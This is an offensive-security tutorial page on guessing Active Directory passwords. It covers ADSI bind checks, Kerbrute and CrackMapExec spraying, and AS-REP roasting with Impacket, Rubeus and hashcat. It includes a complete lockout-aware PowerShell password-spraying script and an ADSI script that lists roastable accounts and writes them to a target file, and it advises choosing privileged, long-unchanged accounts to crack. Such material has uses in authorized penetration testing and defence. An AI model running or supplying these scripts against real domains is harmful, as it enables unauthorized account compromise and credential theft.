Particle42
Password Guessing

Basic Powershell Script

This is a low-and-slow password-guessing method that uses a PowerShell script built on LDAP and ADSI. The script locates the domain's PDC emulator, builds an LDAP path to the domain head, and then calls the DirectoryEntry constructor with a candidate username and password. The constructor alone does not contact the DC: the LDAP bind in the context of that user happens when the object's properties are first read, which is exactly what PowerShell does when it prints the returned object to the console. If the bind succeeds the object's properties are displayed and the password is correct; if it fails, an error such as "The user name or password is incorrect" is raised. Each failed bind still increments badPwdCount on the account, so check the domain lockout threshold before trying more than one password per user.

# Locate the PDC emulator and build an LDAP path to the domain head, e.g. LDAP://<PDC>/DC=p42,DC=com
$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObject.PdcRoleOwner).Name
$SearchURL = "LDAP://"
$SearchURL += $PDC + "/"
# p42.com -> DC=p42,DC=com
$UniqueName = "DC=$($domainObject.Name.Replace('.', ',DC='))"
$SearchURL += $UniqueName
# Bind as the candidate user; printing the returned object forces the LDAP bind, so a wrong password surfaces as an error here
New-Object System.DirectoryServices.DirectoryEntry($SearchURL, "username", "password!")
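As an added example that is not part of the Particle42 page, the same DirectoryEntry bind wrapped into a low-and-slow spray: one candidate password against a list of users, after first reading the domain's lockoutThreshold and lockoutObservationWindow from the domain head so the operator knows how many passes are safe. It assumes a domain-joined host and a users.txt with one sAMAccountName per line; the file name and the delay are illustrative defaults.

```powershell
# Added example (not from the page): ADSI password spray with a lockout-policy check.
# Assumes a domain-joined host; users.txt and the parameter defaults are illustrative.
param(
    [Parameter(Mandatory)] [string] $Password,   # one candidate password per run
    [string] $UserFile = ".\users.txt",          # one sAMAccountName per line
    [int]    $DelaySeconds = 2                   # pause between bind attempts
)

$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC  = ($domainObject.PdcRoleOwner).Name
$DN   = "DC=$($domainObject.Name.Replace('.', ',DC='))"
$LDAP = "LDAP://$PDC/$DN"

# The lockout policy lives on the domain head object. lockoutThreshold 0 means
# "never lock"; lockoutObservationWindow is a negative interval in 100ns ticks,
# converted with the standard ADSI large-integer helper.
$domainHead = [ADSI]$LDAP
$threshold  = [int]$domainHead.lockoutThreshold.Value
$window     = $domainHead.ConvertLargeIntegerToInt64($domainHead.lockoutObservationWindow.Value)
$windowMin  = [math]::Abs($window) / 600000000    # 100ns ticks -> minutes
Write-Host "[*] lockoutThreshold=$threshold, observation window=$windowMin min"
if ($threshold -gt 0) {
    Write-Host "[*] budget: at most $($threshold - 1) passwords per user every $windowMin min"
}

$hits = @()
foreach ($user in (Get-Content $UserFile | Where-Object { $_.Trim() })) {
    # Bare sAMAccountName, as on the page: ADSI resolves it against the current domain.
    $entry = New-Object System.DirectoryServices.DirectoryEntry($LDAP, $user, $Password)
    try {
        # The constructor does not talk to the DC; RefreshCache() forces the bind.
        $entry.RefreshCache()
        Write-Host "[+] $user : $Password"
        $hits += $user
    } catch {
        # HRESULT 0x8007052E is ERROR_LOGON_FAILURE (wrong password). Anything else
        # (locked out, disabled, must change password) is worth reading, so print it.
        $msg = if ($_.Exception.InnerException) { $_.Exception.InnerException.Message } else { $_.Exception.Message }
        Write-Host "[-] $user : $msg"
    } finally {
        $entry.Dispose()
    }
    Start-Sleep -Seconds $DelaySeconds
}
Write-Host "[*] valid credentials for: $($hits -join ', ')"
```

Save it under any name (spray.ps1 is assumed here) and run it once per candidate password, e.g. .\spray.ps1 -Password 'password!'. The script prints the budget but does not track badPwdCount per user, so keeping the number of runs per observation window below that budget is the operator's job.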

Crackmapexec

CrackMapExec can spray a username list and a candidate password against the SMB service of the domain controller (or any domain-joined host); a successful SMB session confirms the credential, and the tool can be told to keep going after the first hit instead of stopping. Failed SMB logons are logged as event ID 4625 on the target and count towards the lockout threshold in the same way as the LDAP bind above. See Using Crackmapexec for the syntax.

Using Crackmapexec

Obtaining a TGT

In this method we request a TGT from the domain controller (an AS-REQ with pre-authentication) for each username with a candidate password: a correct password yields a TGT, a wrong one yields KDC_ERR_PREAUTH_FAILED. Kerbrute is one tool that does this. Because the DC sees a Kerberos pre-authentication failure rather than an interactive or network logon failure, the attempts are logged as event ID 4771 instead of 4625, but they still increment badPwdCount and can lock accounts. The syntax of the command is as follows,

.\kerbrute_windows_amd64.exe passwordspray -d p42.com .\usernames.txt "password!"

AS-Rep Roasting

To obtain a TGT the client normally has to prove knowledge of the user's password first: it encrypts a timestamp with a key derived from the password and sends it in the AS-REQ. This step is called pre-authentication. If pre-authentication is disabled on an account (the DONT_REQ_PREAUTH flag in userAccountControl), the KDC answers any AS-REQ for that user with an AS-REP whose encrypted part is protected by the user's password-derived key. Anyone on the network can request that AS-REP on the user's behalf and then brute-force the password offline, with no lockout risk and no further traffic to the DC.

Using Impacket

Impacket can perform this attack with the following command (on Kali the script is installed as impacket-GetNPUsers; elsewhere it is GetNPUsers.py). Given p42.com/username it prompts for that user's password, binds to LDAP with it, enumerates every account whose pre-authentication is disabled and requests an AS-REP for each (-request). With no valid credential at all, pass candidate names with -usersfile and -no-pass instead; the DC will then answer for whichever of those names has pre-authentication disabled.

impacket-GetNPUsers -dc-ip 192.168.1.2 -request -outputfile hash.asreproast p42.com/username

This writes one line per roastable account to hash.asreproast, in the $krb5asrep$23$user@DOMAIN:... format that hashcat mode 18200 (Kerberos 5 AS-REP, etype 23) expects, and it can be cracked with the following command,

sudo hashcat -m 18200 hash.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Using Rubeus

Rubeus is a Windows tool that performs the same attack from a domain-joined host. It queries LDAP for accounts with the DONT_REQ_PREAUTH flag set, requests an AS-REP for each and prints the resulting hash; /nowrap keeps each hash on a single line so it can be copied without stray line breaks. By default Rubeus prints the John the Ripper form ($krb5asrep$user@domain:...); add /format:hashcat to get the $krb5asrep$23$... form that hashcat mode 18200 expects. The hash is then cracked with hashcat as above.

.\Rubeus.exe asreproast /nowrap

In a given domain the accounts that do not require pre-authentication can also be listed with PowerView.ps1's Get-DomainUser function and its -PreauthNotRequired switch, which filters on the same userAccountControl bit.
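As an added example, not from the page or from PowerView, the same check done with plain ADSI so it works on any domain-joined host without PowerView or RSAT: a DirectorySearcher with the LDAP bitwise-AND matching rule on userAccountControl (4194304 = 0x400000 = UF_DONT_REQUIRE_PREAUTH), excluding disabled accounts, which also writes the names out in the one-per-line form that GetNPUsers -usersfile takes. The output file name asrep_users.txt is an assumption.

```powershell
# Added example (not from the page): list AS-REP-roastable accounts with plain ADSI.
# 4194304 = 0x400000 = UF_DONT_REQUIRE_PREAUTH; 2 = ACCOUNTDISABLE.
# 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND.
$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObject.PdcRoleOwner).Name
$DN  = "DC=$($domainObject.Name.Replace('.', ',DC='))"

$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DN")
# Roastable AND not disabled: a hash for a disabled account cannot be used anyway.
$searcher.Filter = "(&(objectCategory=person)(objectClass=user)" +
                   "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" +
                   "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
$searcher.PageSize = 1000     # paged search so large domains are not cut off at 1000 results
[void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'useraccountcontrol', 'memberof', 'pwdlastset'))

$roastable = foreach ($r in $searcher.FindAll()) {
    $uac    = [int]$r.Properties['useraccountcontrol'][0]
    # memberOf holds DNs; keep only the CN so the group list stays readable
    $groups = @($r.Properties['memberof']) | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }
    [pscustomobject]@{
        User       = [string]$r.Properties['samaccountname'][0]
        UAC        = '0x{0:X}' -f $uac
        Groups     = $groups -join ';'
        # pwdLastSet is a Windows FILETIME; old passwords are the better crack targets
        PwdLastSet = [datetime]::FromFileTime([int64]$r.Properties['pwdlastset'][0])
    }
}
$roastable | Format-Table -AutoSize

# One name per line, the form GetNPUsers -usersfile expects (file name is an assumption)
$roastable.User | Set-Content -Path .\asrep_users.txt
```

The group column is the part worth reading: a roastable account in a privileged group is the one to spend cracking time on, and pwdLastSet tells you whether the password predates the current policy.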


Last updated 1 year ago
